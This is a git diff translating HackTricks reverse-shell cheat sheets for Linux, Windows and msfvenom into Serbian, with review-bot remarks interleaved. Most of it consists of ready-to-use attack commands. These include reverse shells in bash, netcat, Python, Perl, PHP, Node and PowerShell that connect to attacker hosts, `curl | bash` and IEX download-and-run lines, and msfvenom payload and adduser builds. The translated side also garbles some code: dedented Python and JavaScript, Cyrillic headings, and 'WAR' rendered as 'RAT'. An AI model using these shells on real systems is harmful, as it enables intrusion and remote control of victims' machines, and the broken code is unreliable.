iz nekog razloga ne možete dobiti pun TTY, **i dalje možete interagovati sa programima** koji očekuju korisnički unos. U sledećem primeru, lozinka se prosleđuje `sudo` da bi se pročitala datoteka: ```bash expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "";send "\r\n";interact' ``` - -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-hacking/reverse-shells/linux.md b/src/generic-hacking/reverse-shells/linux.md index c1caa101d..909b1e184 100644 --- a/src/generic-hacking/reverse-shells/linux.md +++ b/src/generic-hacking/reverse-shells/linux.md @@ -2,14 +2,13 @@ {{#include ../../banners/hacktricks-training.md}} -**If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com) +**Ako imate pitanja o bilo kojoj od ovih ljuski, možete ih proveriti na** [**https://explainshell.com/**](https://explainshell.com) ## Full TTY -**Once you get a reverse shell**[ **read this page to obtain a full TTY**](full-ttys.md)**.** +**Kada dobijete reverznu ljusku**[ **pročitajte ovu stranicu da biste dobili pun TTY**](full-ttys.md)**.** ## Bash | sh - ```bash curl https://reverse-shell.sh/1.1.1.1:3000 | bash bash -i >& /dev/tcp// 0>&1 @@ -22,11 +21,9 @@ exec 5<>/dev/tcp//; while read line 0<&5; do $line 2>&5 >&5; #after getting the previous shell to get the output to execute exec >&0 ``` +Ne zaboravite da proverite sa drugim shell-ovima: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh i bash. -Don't forget to check with other shells: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, and bash. - -### Symbol safe shell - +### Siguran simbol shell ```bash #If you need a more stable connection do: bash -c 'bash -i >& /dev/tcp// 0>&1' 
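Review bot: hunk `@@ -97,25 +78,16 @@` removes the second 8kSec Academy block at the end of `full-ttys.md` (`Deepen your expertise in **Mobile Security** with 8kSec Academy...` and the `{% embed url="https://academy.8ksec.io/" %}` line); as with the Trickest block in `brute-force.md`, either keep and translate the sponsor text or record the removal in the commit message rather than folding it into a translation commit.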
@@ -35,74 +32,66 @@ bash -c 'bash -i >& /dev/tcp// 0>&1' #B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0 echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null ``` +#### Objašnjenje shell-a -#### Shell explanation - -1. **`bash -i`**: This part of the command starts an interactive (`-i`) Bash shell. -2. **`>&`**: This part of the command is a shorthand notation for **redirecting both standard output** (`stdout`) and **standard error** (`stderr`) to the **same destination**. -3. **`/dev/tcp//`**: This is a special file that **represents a TCP connection to the specified IP address and port**. - - By **redirecting the output and error streams to this file**, the command effectively sends the output of the interactive shell session to the attacker's machine. -4. **`0>&1`**: This part of the command **redirects standard input (`stdin`) to the same destination as standard output (`stdout`)**. - -### Create in file and execute +1. **`bash -i`**: Ovaj deo komande pokreće interaktivni (`-i`) Bash shell. +2. **`>&`**: Ovaj deo komande je skraćena notacija za **preusmeravanje standardnog izlaza** (`stdout`) i **standardne greške** (`stderr`) na **istu destinaciju**. +3. **`/dev/tcp//`**: Ovo je poseban fajl koji **predstavlja TCP vezu sa navedenom IP adresom i portom**. +- Preusmeravanjem izlaza i tokova grešaka na ovaj fajl, komanda efikasno šalje izlaz interaktivne shell sesije na mašinu napadača. +4. **`0>&1`**: Ovaj deo komande **preusmerava standardni ulaz (`stdin`) na istu destinaciju kao standardni izlaz (`stdout`)**. 
+### Kreiraj u fajlu i izvrši ```bash echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1/ 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh; wget http:///shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh ``` - ## Forward Shell -When dealing with a **Remote Code Execution (RCE)** vulnerability within a Linux-based web application, achieving a reverse shell might be obstructed by network defenses like iptables rules or intricate packet filtering mechanisms. In such constrained environments, an alternative approach involves establishing a PTY (Pseudo Terminal) shell to interact with the compromised system more effectively. +Kada se suočavate sa **Remote Code Execution (RCE)** ranjivošću unutar Linux-bazirane web aplikacije, postizanje reverse shell-a može biti otežano mrežnim odbranama poput iptables pravila ili složenih mehanizama filtriranja paketa. U takvim ograničenim okruženjima, alternativni pristup uključuje uspostavljanje PTY (Pseudo Terminal) shell-a za efikasniju interakciju sa kompromitovanim sistemom. -A recommended tool for this purpose is [toboggan](https://github.com/n3rada/toboggan.git), which simplifies interaction with the target environment. - -To utilize toboggan effectively, create a Python module tailored to the RCE context of your target system. For example, a module named `nix.py` could be structured as follows: +Preporučeni alat za ovu svrhu je [toboggan](https://github.com/n3rada/toboggan.git), koji pojednostavljuje interakciju sa ciljnim okruženjem. +Da biste efikasno koristili toboggan, kreirajte Python modul prilagođen RCE kontekstu vašeg ciljnog sistema. 
Na primer, modul nazvan `nix.py` mogao bi biti strukturiran na sledeći način: ```python3 import jwt import httpx def execute(command: str, timeout: float = None) -> str: - # Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution - token = jwt.encode( - {"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^", algorithm="HS256" - ) +# Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution +token = jwt.encode( +{"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^", algorithm="HS256" +) - response = httpx.get( - url="https://vulnerable.io:3200", - headers={"Authorization": f"Bearer {token}"}, - timeout=timeout, - # ||BURP|| - verify=False, - ) +response = httpx.get( +url="https://vulnerable.io:3200", +headers={"Authorization": f"Bearer {token}"}, +timeout=timeout, +# ||BURP|| +verify=False, +) - # Check if the request was successful - response.raise_for_status() +# Check if the request was successful +response.raise_for_status() - return response.text +return response.text ``` - -And then, you can run: - +I onda možete pokrenuti: ```shell toboggan -m nix.py -i ``` +Da direktno iskoristite interaktivnu ljusku. Možete dodati `-b` za Burpsuite integraciju i ukloniti `-i` za osnovniji rce omotač. -To directly leverage an interractive shell. You can add `-b` for Burpsuite integration and remove the `-i` for a more basic rce wrapper. +Druga mogućnost je korišćenje `IppSec` forward shell implementacije [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell). -Another possibility consist using the `IppSec` forward shell implementation [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell). +Samo treba da modifikujete: -You just need to modify: +- URL ranjivog hosta +- Prefiks i sufiks vašeg payload-a (ako ih ima) +- Način na koji se payload šalje (zaglavlja? podaci? dodatne informacije?) 
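Review bot: hunk `@@ -35,74 +32,66 @@` in `linux.md` has two structural regressions. First, the sub-bullet `- By **redirecting the output and error streams to this file**` under item 3 of the shell explanation is dedented to a top-level `- Preusmeravanjem izlaza i tokova grešaka na ovaj fajl` bullet, which splits the ordered list so `4. **`0>&1`**` no longer continues it; keep the indent that nests it under item 3. Second, the `nix.py` module is dedented to column 0: `token = jwt.encode(`, `response = httpx.get(`, `response.raise_for_status()` and `return response.text` now sit at the same level as `def execute(command: str, timeout: float = None) -> str:`, which Python rejects (IndentationError, and `return` outside a function); restore the body indentation from the `-` lines.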
-- The URL of the vulnerable host -- The prefix and suffix of your payload (if any) -- The way the payload is sent (headers? data? extra info?) - -Then, you can just **send commands** or even **use the `upgrade` command** to get a full PTY (note that pipes are read and written with an approximate 1.3s delay). +Zatim, možete jednostavno **slati komande** ili čak **koristiti `upgrade` komandu** da dobijete pun PTY (napomena: cevi se čitaju i pišu sa približno 1.3s kašnjenjem). ## Netcat - ```bash nc -e /bin/sh nc | /bin/sh #Blind @@ -110,42 +99,32 @@ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp nc | /bin/bash | nc rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0 1>/tmp/bkpipe ``` - ## gsocket -Check it in [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/) - +Proverite to na [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/) ```bash bash -c "$(curl -fsSL gsocket.io/x)" ``` - ## Telnet - ```bash telnet | /bin/sh #Blind rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet >/tmp/f telnet | /bin/bash | telnet rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0 1>/tmp/bkpipe ``` - ## Whois -**Attacker** - +**Napadač** ```bash while true; do nc -l ; done ``` +Da biste poslali komandu, otkucajte je, pritisnite enter i pritisnite CTRL+D (da zaustavite STDIN) -To send the command write it down, press enter and press CTRL+D (to stop STDIN) - -**Victim** - +**Žrtva** ```bash export X=Connected; while true; do X=`eval $(whois -h -p "Output: $X")`; sleep 1; done ``` - -## Python - +## Питон ```bash #Linux export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' 
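Review bot: hunk `@@ -110,42 +99,32 @@` renders the `## Python` heading as `## Питон` in Cyrillic while every other heading in the file stays Latin and the other language-name headings (`## Netcat`, `## gsocket`, `## Telnet`, `## Whois`) are left untranslated; keep `## Python`, since it is a product name and the page's anchors are derived from headings.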
@@ -153,23 +132,17 @@ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOC #IPv6 python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' ``` - ## Perl - ```bash perl -e 'use Socket;$i="";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ``` - -## Ruby - +## Руби ```bash ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ``` - ## PHP - ```php // Using 'exec' is the most common method, but assumes that the file descriptor will be 3. // Using this method may lead to instances where the connection reaches out to the listener and then closes. 
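Review bot: same issue in hunk `@@ -153,23 +132,17 @@`: `## Ruby` becomes `## Руби` while `## Perl` and `## PHP` in the same hunk stay as they are; keep `## Ruby` in Latin script.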
@@ -181,51 +154,41 @@ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' /dev/tcp/10.10.14.8/4444 0>&1'"); ?> ``` - ## Java - ```bash r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() ``` - ## Ncat - ```bash victim> ncat --ssl -c "bash -i 2>&1" attacker> ncat -l --ssl ``` - ## Golang - ```bash echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go ``` - ## Lua - ```bash #Linux lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" #Windows & Linux lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' ``` - ## NodeJS - ```javascript (function(){ - var net = require("net"), - cp = require("child_process"), - sh = cp.spawn("/bin/sh", []); - var client = new net.Socket(); - client.connect(8080, "10.17.26.64", function(){ - client.pipe(sh.stdin); - sh.stdout.pipe(client); - sh.stderr.pipe(client); - }); - return /a/; // Prevents the Node.js application form crashing +var net = require("net"), +cp = require("child_process"), +sh = cp.spawn("/bin/sh", []); +var client = new net.Socket(); +client.connect(8080, "10.17.26.64", function(){ +client.pipe(sh.stdin); +sh.stdout.pipe(client); +sh.stderr.pipe(client); +}); +return /a/; // Prevents the Node.js application form crashing })(); 
@@ -256,19 +219,15 @@ or https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py ``` - ## OpenSSL -The Attacker (Kali) - +Napadač (Kali) ```bash openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate openssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands openssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be able to get the response ``` - -The Victim - +Žrtva ```bash #Linux openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : 
@@ -276,103 +235,84 @@ openssl s_client -quiet -connect :|/bin/bash|openssl s_clien #Windows openssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect : ``` - ## **Socat** [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries) ### Bind shell - ```bash victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane attacker> socat FILE:`tty`,raw,echo=0 TCP::1337 ``` - -### Reverse shell - +### Obrnuta ljuska ```bash attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0 victim> socat TCP4::1337 EXEC:bash,pty,stderr,setsid,sigint,sane ``` - ## Awk - ```bash awk 'BEGIN {s = "/inet/tcp/0//"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null ``` - ## Finger -**Attacker** - +**Napadač** ```bash while true; do nc -l 79; done ``` +Da biste poslali komandu, otkucajte je, pritisnite enter i pritisnite CTRL+D (da zaustavite STDIN) -To send the command write it down, press enter and press CTRL+D (to stop STDIN) - -**Victim** - +**Žrtva** ```bash export X=Connected; while true; do X=`eval $(finger "$X"@ 2> /dev/null')`; sleep 1; done export X=Connected; while true; do X=`eval $(finger "$X"@ 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done ``` - ## Gawk - ```bash #!/usr/bin/gawk -f BEGIN { - Port = 8080 - Prompt = "bkd> " +Port = 8080 +Prompt = "bkd> " - Service = "/inet/tcp/" Port "/0/0" - while (1) { - do { - printf Prompt |& Service - Service |& getline cmd - if (cmd) { - while ((cmd |& getline) > 0) - print $0 |& Service - close(cmd) - } - } while (cmd != "exit") - close(Service) - } +Service = "/inet/tcp/" Port "/0/0" +while (1) { +do { +printf Prompt |& Service +Service |& getline cmd +if (cmd) { +while ((cmd |& getline) > 0) +print $0 |& Service +close(cmd) +} +} while (cmd != "exit") +close(Service) +} } ``` - ## Xterm -This will try to connect to your system at port 
6001: - +Ovo će pokušati da se poveže sa vašim sistemom na portu 6001: ```bash xterm -display 10.0.0.1:1 ``` - -To catch the reverse shell you can use (which will listen in port 6001): - +Da biste uhvatili reverznu školjku, možete koristiti (koja će slušati na portu 6001): ```bash # Authorize host xhost +targetip # Listen Xnest :1 ``` - ## Groovy -by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) NOTE: Java reverse shell also work for Groovy - +by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) NAPOMENA: Java reverse shell takođe radi za Groovy ```bash String host="localhost"; int port=8044; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` - -## References +## Reference - [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/) - [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell) diff --git a/src/generic-hacking/reverse-shells/msfvenom.md b/src/generic-hacking/reverse-shells/msfvenom.md index 49444f77b..4996f6db2 100644 --- a/src/generic-hacking/reverse-shells/msfvenom.md +++ b/src/generic-hacking/reverse-shells/msfvenom.md @@ -2,38 +2,20 @@ {{#include ../../banners/hacktricks-training.md}} -
- -Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! - -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking - -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights - -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates - -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! - --- -## Basic msfvenom +## Osnovni msfvenom `msfvenom -p -e -f -i LHOST=` -One can also use the `-a` to specify the architecture or the `--platform` +Može se takođe koristiti `-a` za specifikaciju arhitekture ili `--platform` ## Listing - ```bash msfvenom -l payloads #Payloads msfvenom -l encoders #Encoders ``` - -## Common params when creating a shellcode - +## Uobičajeni parametri prilikom kreiranja shellcode-a ```bash -b "\x00\x0a\x0d" -f c 
@@ -41,162 +23,106 @@ msfvenom -l encoders #Encoders EXITFUNC=thread PrependSetuid=True #Use this to create a shellcode that will execute something with SUID ``` - ## **Windows** -### **Reverse Shell** - +### **Obrnuta ljuska** ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe ``` - ### Bind Shell - ```bash msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe ``` - -### Create User - +### Kreiraj korisnika ```bash msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe ``` - ### CMD Shell - ```bash msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe ``` - -### **Execute Command** - +### **Izvrši Komandu** ```bash msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe ``` - ### Encoder - ```bash msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe ``` - -### Embedded inside executable - +### Ugrađen unutar izvršnog fajla ```bash msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe ``` - ## Linux Payloads ### Reverse Shell - ```bash msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf ``` - ### Bind Shell - ```bash msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf ``` - ### SunOS (Solaris) - ```bash msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf ``` - ## **MAC Payloads** ### **Reverse Shell:** - 
```bash msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho ``` - ### **Bind Shell** - ```bash msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho ``` - ## **Web Based Payloads** ### **PHP** #### Reverse shel**l** - ```bash msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php ``` - ### ASP/x -#### Reverse shell - +#### Obrnuta ljuska ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx ``` - ### JSP -#### Reverse shell - +#### Obrnuta ljuska ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp ``` +### RAT -### WAR - -#### Reverse Shell - +#### Obrnuta ljuska ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war ``` - ### NodeJS - ```bash msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) ``` - -## **Script Language payloads** +## **Script jezik payloads** ### **Perl** - ```bash msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl ``` - ### **Python** - ```bash msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py ``` - ### **Bash** - ```bash msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh ``` - -
- -Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! - -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking - -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights - -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates - -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-hacking/reverse-shells/windows.md b/src/generic-hacking/reverse-shells/windows.md index 4bf4f6792..3e2b82d5e 100644 --- a/src/generic-hacking/reverse-shells/windows.md +++ b/src/generic-hacking/reverse-shells/windows.md 
@@ -4,37 +4,30 @@ ## Lolbas -The page [lolbas-project.github.io](https://lolbas-project.github.io/) is for Windows like [https://gtfobins.github.io/](https://gtfobins.github.io/) is for linux.\ -Obviously, **there aren't SUID files or sudo privileges in Windows**, but it's useful to know **how** some **binaries** can be (ab)used to perform some kind of unexpected actions like **execute arbitrary code.** +Stranica [lolbas-project.github.io](https://lolbas-project.github.io/) je za Windows kao što je [https://gtfobins.github.io/](https://gtfobins.github.io/) za linux.\ +Očigledno, **nema SUID fajlova ili sudo privilegija u Windows-u**, ali je korisno znati **kako** neki **binarni fajlovi** mogu biti (zlo)upotrebljeni za izvođenje nekih neočekivanih akcija kao što je **izvršavanje proizvoljnog koda.** ## NC - ```bash nc.exe -e cmd.exe ``` - ## NCAT -victim - +žrtva ``` ncat.exe -e "cmd.exe /c (cmd.exe 2>&1)" #Encryption to bypass firewall ncat.exe --ssl -e "cmd.exe /c (cmd.exe 2>&1)" ``` - -attacker - +napadač ``` ncat -l #Encryption to bypass firewall ncat -l --ssl ``` - ## SBD -**[sbd](https://www.kali.org/tools/sbd/) is a portable and secure Netcat alternative**. It works on Unix-like systems and Win32. With features like strong encryption, program execution, customizable source ports, and continuous reconnection, sbd provides a versatile solution for TCP/IP communication. For Windows users, the sbd.exe version from the Kali Linux distribution can be used as a reliable replacement for Netcat. - +**[sbd](https://www.kali.org/tools/sbd/) je prenosiva i sigurna alternativa za Netcat**. Radi na Unix-sličnim sistemima i Win32. Sa funkcijama kao što su jaka enkripcija, izvršavanje programa, prilagodljivi izvorni portovi i kontinuirana ponovna konekcija, sbd pruža svestrano rešenje za TCP/IP komunikaciju. Za korisnike Windows-a, sbd.exe verzija iz Kali Linux distribucije može se koristiti kao pouzdana zamena za Netcat. 
```bash # Victims machine sbd -l -p 4444 -e bash -v -n 
@@ -46,46 +39,34 @@ sbd 10.10.10.10 4444 id uid=0(root) gid=0(root) groups=0(root) ``` - ## Python - ```bash #Windows C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] 
for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" ``` - ## Perl - ```bash perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ``` - -## Ruby - +## Руби ```bash #Windows ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ``` - ## Lua - ```bash lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' ``` - ## OpenSSH -Attacker (Kali) - +Napadač (Kali) ```bash openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate openssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands openssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be able to get the response ``` - -Victim - +Žrtva ```bash #Linux openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : 
@@ -93,38 +74,30 @@ openssl s_client -quiet -connect :|/bin/bash|openssl s_clien #Windows openssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect : ``` - ## Powershell - ```bash powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex" powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')" Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')" echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile ``` - -Process performing network call: **powershell.exe**\ -Payload written on disk: **NO** (_at least nowhere I could find using procmon !_) - +Proces koji izvršava mrežni poziv: **powershell.exe**\ +Payload napisan na disku: **NE** (_barem nigde gde sam mogao da pronađem koristeći procmon !_ ) ```bash powershell -exec bypass -f \\webdavserver\folder\payload.ps1 ``` +Proces koji izvršava mrežni poziv: **svchost.exe**\ +Payload napisan na disku: **WebDAV klijent lokalna keš memorija** -Process performing network call: **svchost.exe**\ -Payload written on disk: **WebDAV client local cache** - -**One liner:** - +**Jedna linija:** ```bash $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = 